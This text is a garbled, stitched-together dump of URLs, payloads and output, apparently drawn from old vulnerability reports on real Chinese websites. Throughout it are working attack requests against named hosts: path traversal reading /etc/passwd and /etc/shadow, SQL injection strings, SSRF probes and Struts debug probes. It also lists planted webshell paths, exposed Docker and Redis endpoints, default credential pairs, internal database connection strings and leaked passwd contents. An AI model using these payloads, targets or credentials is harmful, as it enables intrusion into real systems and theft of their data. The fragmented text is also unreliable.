view-source:http://athena.brand.sogou.com/extjs//examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/issue weblogic:weblogic http://oa.tianya.cn/services/MobileService?wsdl SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/ xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/ xmlns:xsd="http://www.w3.org/1999/XMLSchema xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance xmlns:m0="http://tempuri.org/ xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/ xmlns:urn="webservices.services.weaver.com.cn xmlns:urn2="http://workflow.webservices.mobile.weaver SOAP-ENV:Header/ SOAP-ENV:Body urn:checkUserLogin urn:in0 urn:in0 urn:in1 urn:in1 urn:in2 urn:in2 urn:checkUserLogin SOAP-ENV:Body SOAP-ENV:Envelope https://github.com/mlml1020/TestProject/ https://github.com/mlml1020/TestProject/blob/dcd8cccb7e61c73e0ca837c7c85a9fa3f28bee75/project2/resources/system-config.properties jdbc:oracle:thin:@10.4.207.6:1521:ora www.mianshui365.com/m.mianshui365.com http://m.mianshui365.com/index.php?_a=charter&_c=active&partner_id=51&pid=706&step=2 http://opr.meihua.info/ com:42.96.192.25 http://42.96.192.25:3133/?activityid=1 http://115.159.119.88:2375 ip-172-31-43-63:/home/ubuntu# tcp://115.159.119.88:2375 com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/acc_cloud:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest 
com:80/gcloud/free_zone_version_server_20160420:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/acc_cloud:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_dir_server_withacc:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest com:80/gcloud/free_zone_version_server:latest http://m.rrs.com/ http://202.96.57.47/ http://202.96.57.47/ca/ma3.jsp http://**.**.**.**/link?url=-NwVhyRtnGJuOrwx53DHpTzdhcfl0XWcG8Yn8hjTw4e7cZKBfVZW0mhPgp4Xw9YWfJx2ZnPMUYwR4dVS7wBwa3r-jTpZh8sG5ljf_AKE7Ee ftp://**.**.**.** https://**.**.**.**/ryansecret/reprostservice/blob/83d246d34d8e2b0d6e3c124ef99976bef341dbcd/UpLoadLogFile/App.config http://**.**.**/023/index.jspx https://github.com/piaoxj/bankchannel/blob/efaebdebddbbb5f2be340a9852619cd9ea8a7ebf/pay-channel-access/src/main/profiles/dev/config/jdbc.properties jdbc:mysql://115.28.14.202:3306/pay_channel2?useUnicode=true&characterEncoding=UTF-8 
http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://10.13.199.124.xip.io:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd%23 http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://168675196:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd%23 http://www.sogou.com/reventondc/transform?charset=GBK&key=%E8%B0%A2%E6%96%87%E4%B8%9C1&objid=2000000&type=2&userarea=sss&vrid=70043804&url=http://www.sogou-inc.com http://opendata.readnovel.com/web/user.php?a=update_user http://123.125.105.158:2375/version http://123.125.105.159:2375/version http://210.38.57.21/gyxszz/xxsh/news.php?id=220 http://miyu.apps.ibaihe.com/talk/mylist?appName=meet&latitude=40.001696&limit=10&channel=android%7C%7CAndroid_5.1%7C%7C028_miyu_android_test%7C%7C8681-A01%7C%7CQiKU&page=1&userid=523618&version=3.6.0&longitude=116.486212 http://210.38.57.94/news/news.php?id=6625 www.treebear.cn http://www.treebear.cn/common/image/upload.htm www.treebear.cn ie.sogou.com/designguidelines/getimage.php?cate=uikit&index=/../../../../../../etc/passwd%00.jpg&type=2 ie.sogou.com/designguidelines/getimage.php?cate=uikit&index=/../../../designguidelines/getimage.php%00.jpg&type=2 URL:http://61.145.111.23/zh-CN/Account/Login发现1个弱口令: http://web.admin5.com/w/user/index.php?g=user&m=login&a=index https://114.251.242.150/etrading/.svn/entries jdbc:oracle:thin:@**.**.**.**:1523:hwcpmis1 
http://nc.gtcloud.cn/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute&TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=1 http://123.206.30.193:2375 tcp://123.206.30.193:2375 docker.baihe.com/nginx docker.baihe.com/php5 docker.baihe.com/php5.5 docker.baihe.com/php-fpm docker.baihe.com/baiheredis docker.baihe.com/mongo docker.baihe.com/php docker.baihe.com/mysql docker.baihe.com/baihemysql daocloud.io/nginx docker.baihe.com/baihenginx docker.baihe.com/nginx docker.baihe.com/centos docker.baihe.com/redis docker.baihe.com/redis docker.baihe.com/memcache daocloud.io/daocloud/daocloud-toolset docker.baihe.com/php-fpm docker.baihe.com/dockerui docker.baihe.com/centos7 http://58.56.128.89/security/loginInit.action http://hrois.haier.net/security/loginInit.action http://www.huochaihe.com/mba/pass/passTopic.php?action=fail&id=159202&reason_id=12&ispass=-2&user_id=919113&forward=%2Fmba%2Fpass%2FpassTopic.php%3Faction%3Dlist%26p%3D1%26ispass%3D-2 http://www.huochaihe.com/mba/pass/passTopic.php?action=fail&id=159202&reason_id=12&ispass=-2&user_id=919113&forward=%2Fmba%2Fpass%2FpassTopic.php%3Faction%3Dlist%26p%3D1%26ispass%3D-2 http://www.huochaihe.com/mba/comment/list.php?action=thread_comment_list&user_id=879081 https://**.**.**.**/home/index.do https://**.**.**.**/file.do?fileId=77291 http://27.223.70.11/ http://27.223.70.11/reg_success.asp http://union.elong.com/zh-CN/Account/Forgetpass foxmail.com/wooyun123,做了各种测试,洞洞真的存在的啊啊啊啊,这里就不重复放过程了 http://union.elong.com/zh-CN/register(谷歌出来的。。。) http://27.223.70.16:443/gems/security/loginInit.action http://27.223.70.16:443/gems/security/loginInit.action?request_locale=en_US 
http://www.sogou.com/reventondc/transform?charset=GBK&key=2000&objid=2000000&type=2&url=http://cloud.sogou-op.org&userarea=sss&uuid=111&vrid=123 www.csrcbank.com http://www.csrcbank.com http://baike.baidu.com/link?url=FE1INkeOjK5QdIL5k2-CaFSOUAsMwOfLn6SvWswMXXs5PlkzW8LvX7vYRT6eYhnYrMlCZ5pdDZDQjGdp0_wjOK http://renren.haier.com/.git/config http://renren.haier.com/admin/default/login http://renren.haier.com:8080/phpmyadmin http://180.166.172.123/ http://180.166.172.123:7001/ http://**.**.**.** http://58.220.27.205/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 https://github.com/kvkens/ehaierOnlineTools/blob/4ce2e3afefc7ad53717c2a2479c85d7253905713/controllers/homeController.js http://**.**.**.**/console/login/LoginForm.jsp http://lt-car.ecaic.com http://*.*.*.*/wcm/services/trswcm:SOAPService https://e.chunyuyisheng.com/login.action https://adsy.chunyuyisheng.com/login.action?debug=command&expression=3*2-1 https://e.chunyuyisheng.com/login.action?debug=command&expression=3*2-1 https://e.chunyuyisheng.com/ksi.jsp http://iwatchome.tom.com/ https://github.com/chen52671/MyPythonBox/blob/fc639e4cb4bf724b29bd10f840b66d0d71e577cc/MailSend/mailsend.py http://oa.htfutures.com/ http://htqhoa.com/ http://htqhoa.com:89/manager/admin/login.do http://www.huyi.top/ http://117.121.50.210:8161/admin/ http://ai.iflytek.com:8161/admin/ admin:admin http://117.121.50.210 www.xfyun.cn http://zone.wooyun.org/content/26827 http://**.**.**.**:8090/.svn/wc.db http://**.**.**.**:8090/.svn/pristine/54/54147de0309dbf67abfd209a09cbe541508f8f57.svn-base http://**.**.**.**:8090/.svn/pristine/6c/6c9d2d12321e5d44e986f4ba5a47b2396400ca8a.svn-base 
http://**.**.**.**:8081/.svn/pristine/f8/f88de23430a626342e404c71399eeb070792ebc9.svn-base http://admin.info.house.sina.com.cn/ http://newoa.xbwl.cn:89/m1/login.do http://oa.xbwl.cn:89/m1/login.do http://oa.xbwl.cn:89/manager/admin/login.do http://logistics.genomics.cn/manager/html https://logistics.genomics.cn/app/app1.jsp http://m.sogou.com/music/musicDownload.jsp?album=%E5%8F%A3%E9%9F%B3&clk=2&keyword=1&lyc=&lyricMatch=yes&p=1&qqdurl=http://cc.stream.qqmusic.qq.com/C100002T2WQy2NIgLS.m4a%3Ffromtag%3D52&s=%E7%AA%A6%E5%94%AF&singer=%E7%AA%A6%E5%94%AF&size=0&title=1&type=%E6%9C%AA%E7%9F%A5&uID=qE_VFO3qxwVsK7Gx&url=http://xxx.com/1&v=2&w=1111 http://xxx.com?xxoo http://xxx.com/2 file:///etc/issue http://xxx.com/%payload file:///etc/issue ftp://xxx.com/%payload http://zone.wooyun.org/content/26651 http://www.263.net/internetstore/sisClient/getBindUserId.action?a=0.04832417261786759&mobile=1888888888*&_=1459418213432 http://www.gevek.com/api/GameApi/editmyself http://sandbox.api.haodai.com/.git/config https://**.**.**.**/jasine/buildpgap/blob/a1156e863638c25657946c0e25fc82a7b022a40f/services/gridService.js https://**.**.**.**,登录成功,这个人属于中科院超级计算中心,搜了下邮箱还有不少关于超级计算中心的文档: http://forum.acg.haier.net/bbs/robots.txt/a.php http://forum.acg.haier.net/bbs/robots.txt/a.php http://apmp.allinpay.com:8080 http://apmp.allinpay.com:8080/ydqzeval/s.jsp?o=index https://116.236.252.101/por/login_psw.csp?rnd=0.6040615672768606 http://123.126.42.32:8089// http://oa.bestv.com.cn/login/Login.jsp?logintype=1 http://oa.bestv.com.cn:89/m1/login.do http://oa.bestv.com.cn:89/manager/admin/login.do http://222.190.108.19/existVendorsAction http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/ http://exp.baidu.com/?r=site/home http://wooyun.org/bugs/wooyun-2016-0198361 http://tiyan.baidu.com http://exp.baidu.com/static/img.php?s=16,40&n=....//....//index.php%00.png 
https://github.com/billgreen9/timer/blob/7091ed9843497813162cdfe5afb333f82efaefd4/src/main/java/com/tudou/timer/SendMail.java redis://211.150.65.60:6381 redis://211.150.65.60:6380 redis://211.150.65.60:6300 redis://211.150.65.60:6301 http://m.baidu.com/searchbox?action=userx&type=search&service=bdbox&osname=baidubox&data={%22content%22:%2218601350679%22 http://tsz.gfan.com/ http://mall.ch.com/product/search?name=%E5%A4%A9%E5%B0%A7%E6%95%B0%E7%A0%81 http://sqlmap.org http://**.**.**.**/bugs/wooyun-2016-0209082 http://**.**.**.**/ http://**.**.**.**/admin-console/login.seam?conversationId=57 http://demos.qiniu.com/demo/qimage/index.html http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast http://172.30.251.168:9200编码为base64放在image后。 http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast http://172.30.251.168:9200 http://172.30.251.168:1356 http://demos.qiniu.com/demo/qimage/index.html http://**.**.**.**//cmsDeskArticle/bankCardType/1 http://www.mafengwo.cn/sales/union.php?step=preView&pdf=/etc/passwd http://**.**.**.** http://oa.szlng.com.cn/login/Login.jsp?logintype=1 http://oa.szlng.com.cn:89/m1/login.do http://oa.szlng.com.cn:89/manager/admin/login.do http://123.234.41.54:7008/portal/dt/System admin:12345678 https://**.**.**.**/mbsios/localinstallplist jdbc:oracle:thin:@**.**.**.**:1521:mzjz2 jdbc:oracle:thin:@**.**.**.**:1521:orb http://123.234.41.52:7009/manager/html tomcat:tomcat http://**.**.**.**/bugs/wooyun-2016-0210607 www.ganji.com http://www.ganji.com admin:axis2 http://shop.yijia360.com:81/bin.rar http://**.**.**.**/ http://**.**.**.**/art/2016/5/13/art_812270_719011.html http://**.**.**.**/art/2016/5/20/art_812270_736179.html http://eservice.digiwin.com.cn/ http://beian.21vianet.com/----58.83.224.154 http://ssj.gfan.com/ http://ssj.gfan.com/ 
http://a.readnovel.com/usericon.php?a=load_icon_js&id=45619122,57738912,14444201,13089209,60299748,60299748,27913735,49165864,60308247,4010667,30284734,30284734,4010667,58931113,56685425,12843058,11121284,13429340,60010973,14846534 http://event.readnovel.com/RNfljh/.svn/entries http://event.readnovel.com/rnenter/.svn/entries http://free.readnovel.com/robots.txt/a.php http://www.readnovel.com/robots.txt/a.php http://www.readnovel.com/friendlink.php?url=http%3A%2F%2Fwww.gov.cn%2F%3F1463749061.37 http://big.readnovel.com/search?ranker=ranker&keyword=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&finish_flag=finish_flag&publisherid=1finish_flag http://**.**.**.**/loadproduct.do?author=WT0001&saleman=&UID= http://117.78.23.6:8088/user/gotoLoginPage.action http://**.**.**.**:80/manager/html http://**.**.**.**/wooyun/wooyun.jsp http://www.misuland.com http://**.**.**.**/caissaweb/jsp/login/login.jsp http://**.**.**.**/bugs/wooyun-2010-0178470 http://lib.wap.zol.com.cn/bbs/ios/checkCollect.php?vs=460 http://**.**.**.**/ http://**.**.**.**:2000/存在任意文件上传 http://**.**.**.**:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000& http://sso.mojing.cn/user/api/setusername http://wooyun.org/bugs/wooyun-2016-0185816 http://**.**.**.**/bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c12f9 http://**.**.**.**/Site/Home/CN http://bbs.xt.ztgame.com/zb/fsb3.php?rt=11&sid=95 http://rdm.iflytek.com:2000/ http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=d3BwMS5qc3A=&start=0&size=7000& https://125.88.6.174/logon.jsp http://**.**.**.**/ http://**.**.**.**:8080/WRYJG/STZXGK/show.aspx?NewsID=8 http://b2b.crpjs.net/index.aspx http://b2b.crpjs.net/FCKeditor/editor/filemanager/connectors/test.html# http://www.mafengwo.cn/insurance/ http://admin.pay.sina.com http://admin.pay.sina.com/..//..//..//..//..///etc/passwd https://sqvpn.yundasys.com:8443/vpn/ui/view/index.html?actionId=index https://sqvpn.yundasys.com:8443/vpn/ui/view/index.html?actionId=index 
http://car.yundasys.com:81/yd_khd/mainfram.php jdbc:oracle:thin:@**.**.**.**:1521:ora8 http://live800.wan.renren.com/live800//sta/export/chatHoursSta.jsp https://**.**.**.**/zhgo116/fancy/blob/32d6bc6a4f35dc6eae8c3cc6890c17289c9533f0/FancyInterface/src/main/java/cn/telling/tools/sendMail/StartMain.java www.tpre.cntaiping.com/index.php/Home/Show/index/cid/20/id/ http://ebooking.elong.com/ http://ebooking.elong.com/ebkcommon/dashboard http://**.**.**.** http://**.**.**.**/DiyFile/image/2016/05/23/15/13850030861-6362e0e4-4b5e-4b91-a1a1-c6e1afa4e466.jsp http://**.**.**.**/DiyFile/image/2016/05/23/15/13850030861-6362e0e4-4b5e-4b91-a1a1-c6e1afa4e466.jsp http://**.**.**.**/pflifeRecommend/login/toLoginUI.do http://note.youdao.com/yws/mapi/xueba?method=getNote http://**.**.**.**/vportal/kd.action open.xiaopi.com/sdk/ajax/isemailexist/ http://pms.xiaopi.com http://china.smart.com/ http://china.smart.com/community/read.php?tid=26563 http://china.smart.com/community/read.php?tid=26563 http://china.smart.com/community/read.php?tid=26563 http://cwc.gzhmu.edu.cn http://cwc.gzhmu.edu.cn:8019/cms/login.jsp http://cwc.gzhmu.edu.cn:8019/cms/system/selectUsers.jsp http://cwc.gzhmu.edu.cn:8019/cms/web/downloadFiles.jsp?file=/etc/shadow http://open.lvgou.com/index/taglist?cat_id=3&cityid=1&pid=2 http://**.**.**.**/test.aspx http://www.ceresearch.cn admin:1a2d3m4i5nx http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?classify=1&flag=fancy&limit=3&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1 http://**.**.**.**/ http://px.open.com.cn/traincenter/centerlist.aspx?ProvinceCode=ZXFL35 http://**.**.**.** http://go.sogou.com http://go.sogou.com/ApiForTicket.php http://go.sogou.com/ApiForTicket.php?callback=&tcity=广州;host http://pic.sogou.com http://pic.sogou.com/ris http://pic.sogou.com/ris?query=http://ssrf.sogou.99fd5e.dnslog.info/hello.jpg&er=3&flag=1 http://blog.nsfocus.net/java-deserialization-vulnerability-overlooked-mass-destruction/ 
http://contact.mercedes-benz.com.cn/brochure http://contact.mercedes-benz.com.cn http://retail.mercedes-benz.com.cn/login.aspx http://106.39.111.48:7001/ca/ma3.jsp http://**.**.**.**/ForePage/Skin/NewList1.aspx?ClassId=164&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://**.**.**.**/ForePage/Skin/NewList1.aspx?ClassId=164&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 https://github.com/landylee1989/faster/blob/ac713f628ba81ef59c8a91c10ca6c2fa437a5815/spec/support/baseapi/acc.rb http://222.73.202.226:9000 http://IP/data/itdb.db http://222.73.202.226:9900/data/files/other-ae-e93c.php http://192.168.220.5 http://192.168.220.179 http://192.168.220.50 http://192.168.220.5 localhost:443 localhost:3456 http://54.183.142.88/ch.php http://54.183.142.88/tunnel.php http://b2c.csair.com/B2C40/modules/bookingnew/manage/login.html http://www.263.net/263/download/ http://cc.263.net/rest/netmeeting/quickLoginNet http://122.96.52.7/login.jsp http://shangjia.ecej.com/init# http://admin.ecej.com https://mail.readnovel.com https://mail.readnovel.com/extmail/cgi/index.cgi https://mail.readnovel.com/extmail/cgi/index.cgi http://app.gwdang.com/app/price_baicai?brand=tcl&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id= http://app.gwdang.com/app/price_baicai?brand=tcl%bf%27%2B%20AND%20%28SELECT%202518%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71787a6271%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7171787171%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29+--+-&class_id=&format=json&img_width=180&keyword=&order_by=&pg=1&ps=20&site_id= http://retail.mercedes-benz.com.cn AS:2048 AS:2048 jdbc:oracle:thin:@**.**.**.**:1521:jswbt http://cc.263.net/login http://cc.263.net/quickLogin http://**.**.**.**/cms/special/specialUrl.aspx http://ting.weibo.com/movieapp/emotion/getversion?display=1 http://ting.weibo.com/movieapp/emotion/getversion?display=1 
http://ting.weibo.com/movieapp/emotion/getversion?display=1%20and%201=2 http://ting.weibo.com/movieapp/dialogue/show http://smb.digiwin.com.cn/cms_app/Login.aspx http://**.**.**.**:7009/uddiexplorer/hj.jsp jdbc:oracle:thin:@**.**.**.**:1521:SKSS http://ad.hz.letv.com/CJO/php/Save_ad_wph_cmt.php?remark=wph&name=1&text=%3Cinput+%2F%3E&pic=0&callback=jQuery17105813498379171187_1464161411962&_=1464161422761 http://**.**.**.**/profile/create http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp http://fb.ku6.com/page/submitfb.html http://admin.fb.ku6.com/feedback/toFindFeedbackList.action?qq-pf-to=pcqq.c2c http://admin.fb.ku6.com/tamad3.jsp http://ceagent.ceair.com/ceagent/security/login!authBackFailure.shtml http://**.**.**.**/custom/grzhye.aspx?id0000=1234567890&page=1&xming0=1 http://**.**.**.** http://sakai.fudan.edu.cn/projects/fudan-sakai http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi 
daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic:x:500:500::/home/weblogic:/bin/bash http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/hosts https://hmall.huazhu.com/member_addressList.html https://hmall.huazhu.com http://m.114piaowu.com/userCenterTrain/userCenterTrain_payTrainOrder.action?orderId=9272363&order_userId=5311555 http://**.**.**.**:8080/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false 
distcache:x:94:94:Distcache:/:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin uuidd:x:100:102:UUID daemon:/var/lib/libuuid:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash cimsrvr:x:101:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin ident:x:98:98::/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin pvm:x:24:24::/usr/share/pvm3:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:102:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic:x:801:801::/home/weblogic:/bin/bash 
http://im.cdzq.com:9901/PersonalPortal/download.jsp?filePath=/upload/b4629ba2-b587-4eb9-85d8-8d87426ca796/../../WEB-INF/web.xml&fileName=web.xml http://www.i21st.cn/ http://www.i21st.cn/z/graduate/upload.php http://www.i21st.cn/z/graduate/upload.20140507.php http://www.i21st.cn/z/graduate/pics/temp/1574678f353e864.03763844.php http://www.i21st.cn http://elt.i21st.cn http://app.i21st.cn http://duxie.i21st.cn http://xuetongshe.i21st.cn http://search.i21st.cn http://m.i21st.cn http://**.**.**.**/bugs/wooyun-2010-0199231 http://**.**.**.**/ caow:caowei http://appapi.yc.ifeng.com/web/qy_comments.php?a=shuping_index&articleid=3 http://www.4008000000.com/ http://www.4008000000.com/downLoad.jsp?filename=../../../WEB-INF/web.xml admin:axis2 encap:Ethernet C8:1F:66:F3:83:1C ca1f:66ff:fef3:831c/64 Scope:Link MTU:1500 packets:277781247 packets:657627130 txqueuelen:1000 AS:2048 AS:2048 AS:2048 http://**.**.**.**:8088/uddiexplorer/out.jsp http://**.**.**.**:8088/uddiexplorer/cc.jsp AS:2048 AS:2048 AS:2048 jdbc:oracle:thin:@**.**.**.**:1521:SZYB http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&ct=iOS&pos=1 http://**.**.**.**/ https://github.com/tianjlj/TJL/blob/b2019f75eae34ee4ed3512974b9a9a8b3cd1087f/Ltest/send_mail.py http://210.38.57.21:82 http://222.85.76.20/custim/cardsim.do?cidcode=1 HELO:10.3.6.0.false AS:2048 HELO:10.3.6.0.false AS:2048 HELO:10.3.6.0.false AS:2048 http://222.85.76.20/uddiexplorer/cc.jsp http://csc.changansuzuki.com:80/csc/include/cspprepair.jsp?vin=BB137768&engine=B7DY48008&configId=24308 